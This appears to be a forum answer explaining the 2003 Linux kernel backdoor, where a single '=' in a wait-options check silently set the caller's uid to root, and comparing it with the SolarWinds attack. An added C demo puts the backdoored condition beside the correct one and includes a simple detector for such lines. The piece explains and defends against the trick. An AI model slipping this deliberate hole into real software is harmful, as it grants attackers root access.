To give a slightly different answer from the others, a few backdoors have been caught in the Linux kernel over the years (which means there are maybe some that have not been caught).
I like to cite the example from 2003:
The modified code was this:
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
            retval = -EINVAL;
Looks harmless, right? If this function was called with the options __WCLONE and __WALL and you are root ... wait, current->uid = 0 ... current->uid == 0 ... huh, that's not asking if you are root, that's setting you to root! So if you call this function with those two options together, then BAM! you're now root!
As it turns out, this change was not even made by a trusted Linux contributor; someone hacked into the version control server and planted this code change, and so it was caught when someone noticed that this commit did not have a proper author associated with it (I'm simplifying a bit, you can read the full story at the link above).
What makes you think this kind of attack is unique to open source?
Remember the SolarWinds attack that started in Dec 2020 and raged across the net landscape for the next 4 months?
In this case, the attackers introduced a pre-crafted backdoor into a trusted software product (SolarWinds Orion) that was delivered automatically to thousands of customers, disguised as a normal update. (source)
Well that sounds familiar!
So I think you are completely correct to worry about insider threat and backdoors in software, but this problem is definitely not unique to open source! If anything, these types of backdoors are more likely to be caught in open source, where you typically have dozens to hundreds of contributors and a very strict pull request and code review process, compared to private companies where devs tend to work on teams of 6-10 and typically everybody can put code straight on the master branch and skip code review if they want to (it's often considered rude to do that, but often not strictly enforced).
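To make the assignment-versus-comparison trick in the answer above concrete, here is an added C example that is not part of the original post or of the kernel. It uses a constructed stand-in `struct task` with a single `uid` field, placeholder values for `__WCLONE`, `__WALL` and `EINVAL`, and puts the backdoored condition next to the intended one so the side effect on `uid` can be observed. It also includes a small textual check, `suspicious_assignment_in_condition`, of the kind a reviewer or pre-commit hook might run: it flags a lone `=` inside an `if (...)` condition, which is worth having because the extra parentheses around `(current->uid = 0)` are exactly what silence GCC's `-Wparentheses` warning.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-ins; the real kernel values and task struct are not used here. */
#define __WCLONE 0x80000000u
#define __WALL   0x40000000u
#define EINVAL   22

struct task {
    unsigned int uid;   /* 0 means root in this toy model */
};

/* The shape of the 2003 change: a single '=' assigns 0 to uid as a side effect.
 * The && never fires (the assignment evaluates to 0), so retval is unchanged,
 * but the caller has been made root on the way out. */
int check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;
    return retval;
}

/* What the line was meant to say: '==' only compares, uid is never written. */
int check_correct(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Review aid (hypothetical helper): returns 1 if the first if-condition on the
 * line contains a bare '=' that is not part of '==', '!=', '<=' or '>='.
 * Textual, so it still catches the parenthesised form that -Wparentheses skips. */
int suspicious_assignment_in_condition(const char *line)
{
    const char *p = strstr(line, "if");
    if (!p) return 0;
    p = strchr(p, '(');
    if (!p) return 0;
    int depth = 0;
    for (const char *c = p; *c; c++) {
        if (*c == '(') {
            depth++;
        } else if (*c == ')') {
            if (--depth == 0) break;          /* end of the condition */
        } else if (*c == '=') {
            char prev = (c > line) ? c[-1] : '\0';
            if (c[1] == '=') { c++; continue; } /* '==' comparison */
            if (prev == '!' || prev == '<' || prev == '>' || prev == '=') continue;
            return 1;                          /* lone '=' inside the condition */
        }
    }
    return 0;
}

int main(void)
{
    struct task a = { 1000 }, b = { 1000 };

    check_backdoored(&a, __WCLONE|__WALL);
    check_correct(&b, __WCLONE|__WALL);
    printf("backdoored: uid now %u\n", a.uid);   /* 0: caller became root */
    printf("correct:    uid now %u\n", b.uid);   /* 1000: unchanged */

    const char *bad  = "if ((options == (__WCLONE|__WALL)) && (current->uid = 0))";
    const char *good = "if ((options == (__WCLONE|__WALL)) && (current->uid == 0))";
    printf("flag bad line:  %d\n", suspicious_assignment_in_condition(bad));
    printf("flag good line: %d\n", suspicious_assignment_in_condition(good));
    return 0;
}
```

Note that the backdoored version only touches `uid` when both flags are set together, which is why an unusual flag combination was a good trigger: ordinary callers never exercise that branch, so nothing looks broken in testing. The textual check is deliberately crude (it reads one line and stops at the closing parenthesis of the condition); a real review setup would rely on a compiler or linter, but the point is that a lone `=` in a condition deserves a human look regardless of whether the compiler complains.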